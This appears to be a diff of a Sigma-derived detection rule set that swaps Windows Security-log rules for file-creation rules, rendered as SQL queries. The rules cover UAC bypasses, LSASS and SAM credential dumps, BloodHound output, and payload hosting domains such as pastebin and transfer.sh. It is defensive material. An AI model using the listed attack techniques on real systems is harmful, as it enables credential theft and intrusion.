"RottenPotato Like Attack Pattern", - "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", - "status": "test", - "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", - "author": "@SBousseaden, Florian Roth", + "title": "Suspicious File Creation In Uncommon AppData Folder", + "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", + "status": "experimental", + "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1557.001" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' 
AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_susp_rottenpotato.yml" + "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" }, { - "title": "Windows Defender Exclusion Set", - "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", - "status": "test", - "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", - "author": "@BarryShooshooga", + "title": "Suspicious Executable File Creation", + "id": "74babdd6-a758-4549-9632-26535279e654", + "status": "experimental", + "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1564" ], "falsepositives": [ - "Intended inclusions by administrator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\'))" ], - "filename": "win_security_defender_bypass.yml" + "filename": "file_event_win_susp_executable_creation.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - Security", - "id": 
"4edf51e1-cb83-4e1a-bc39-800e396068e3", - "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "UAC Bypass Using MSConfig Token Modification - File", + "id": "41bb431f-56d8-4691-bb56-ed34e390906f", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_clip_services_security.yml" + "filename": "file_event_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Mimikatz DC Sync", - "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", + "title": "Wmiexec Default Output File", + "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", "status": "experimental", - "description": "Detects Mimikatz DC sync security events", - "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", + "description": "Detects the creation of the default output filename used by the wmiexec tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.s0002", - "attack.t1003.006" + "attack.lateral_movement", + "attack.t1047" ], "falsepositives": [ - "Valid DC Sync that is not covered by the filters; please report", - "Local Domain Admin account used for Azure AD Connect" + "Unlikely" ], - 
"level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$')" ], - "filename": "win_security_dcsync.yml" + "filename": "file_event_win_wmiexec_default_filename.yml" }, { - "title": "Weak Encryption Enabled and Kerberoast", - "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", - "status": "test", - "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", - "author": "@neu5ron", + "title": "Suspicious Creation with Colorcpl", + "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "status": "experimental", + "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1564" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE 
'%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE 
'\\'))))" ], - "filename": "win_security_alert_enable_weak_encryption.yml" + "filename": "file_event_win_susp_colorcpl.yml" }, { - "title": "CVE-2023-23397 Exploitation Attempt", - "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", + "title": "BloodHound Collection Files", + "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", "status": "experimental", - "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", - "author": "Robert Lee @quantum_cookie", + "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", + "author": "C.J. May", "tags": [ - "attack.credential_access", - "attack.initial_access", - "cve.2023.23397" + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM" + "Some false positives may arise in some environment and this may require some tuning. 
Add addional filters or reduce level depending on the level of noise" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" ], - "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" + "filename": "file_event_win_bloodhound_collection.yml" }, { - "title": "Active Directory User Backdoors", - "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", - "status": "test", - "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", - "author": "@neu5ron", + "title": "CVE-2022-24527 Microsoft Connected Cache LPE", + "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", + "status": "experimental", + "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1098", - 
"attack.persistence" + "attack.privilege_escalation", + "attack.t1059.001", + "cve.2022.24527" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_alert_ad_user_backdoors.yml" + "filename": "file_event_win_cve_2022_24527_lpe.yml" }, { - "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", - "id": "2c99737c-585d-4431-b61a-c911d86ff32f", + "title": "UAC Bypass Using EventVwr", + "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "status": "experimental", - "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", - "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", + "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ - "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_account_backdoor_dcsync_rights.yml" + "filename": "file_event_win_uac_bypass_eventvwr.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Security", - "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", + "title": "WScript or CScript Dropper - File", + "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", + "author": "Tim Shelton", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE 
'%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" + "filename": "file_event_win_cscript_wscript_dropper.yml" }, { - "title": "Password Dumper Activity on LSASS", - "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", - "status": "test", - "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", - "author": "sigma", + "title": "UEFI Persistence Via Wpbbin - FileCreation", + "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", + "status": "experimental", + "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. 
Which could be indicative of UEFI based persistence method", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\'" ], - "filename": "win_security_susp_lsass_dump.yml" + "filename": "file_event_win_wpbbin_persistence.yml" }, { - "title": "Successful Overpass the Hash Attempt", - "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", + "title": "Suspicious Desktopimgdownldr Target File", + "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", "status": "test", - "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", - "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", + "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.s0002", - "attack.t1550.002" + "attack.defense_evasion", + "attack.t1105" ], "falsepositives": [ - "Runas command-line tool using /netonly parameter" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" + 
"SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" ], - "filename": "win_security_overpass_the_hash.yml" + "filename": "file_event_win_susp_desktopimgdownldr_file.yml" }, { - "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", - "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", - "status": "test", - "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", - "author": "Ilyas Ochkov, oscd.community", + "title": "WerFault LSASS Process Memory Dump", + "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", + "status": "experimental", + "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" ], - "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" + "filename": "file_event_win_lsass_werfault_dump.yml" }, { - "title": "Ngrok Usage with Remote Desktop Service", - "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", + "title": "Potential SAM Database Dump", + "id": 
"4e87b8e2-2ee9-4b2a-a715-4727d297ece0", "status": "experimental", - "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", + "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" + "attack.credential_access", + "attack.t1003.002" ], - "filename": "win_terminalservices_rdp_ngrok.yml" - }, - { - "title": "New Firewall Exception Rule Added For A Suspicious Folder", - "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", - "status": "experimental", - "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", - "author": "frack113", "falsepositives": [ - "Any legitimate application that runs from the AppData user directory" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2') OR ((ApplicationPath LIKE '%AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\'))))" + "Rare cases of administrative activity" ], - "filename": "win_firewall_as_add_rule_susp_folder.yml" - }, - { - "title": "All Rules Have Been Deleted From The Windows Firewall 
Configuration", - "id": "79609c82-a488-426e-abcf-9f341a39365d", - "status": "experimental", - "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", - "author": "frack113, Nasreddine Bencherchali", "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2033' AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\') OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\'))" ], - "filename": "win_firewall_as_delete_all_rules.yml" + 
"filename": "file_event_win_sam_dump.yml" }, { - "title": "Suspicious Remote AppX Package Locations", - "id": "8b48ad89-10d8-4382-a546-50588c410f0d", + "title": "Suspicious File Created Via OneNote Application", + "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", + "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", + "Occasional FPs might occur if OneNote is used internally to share different embedded documents" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE 
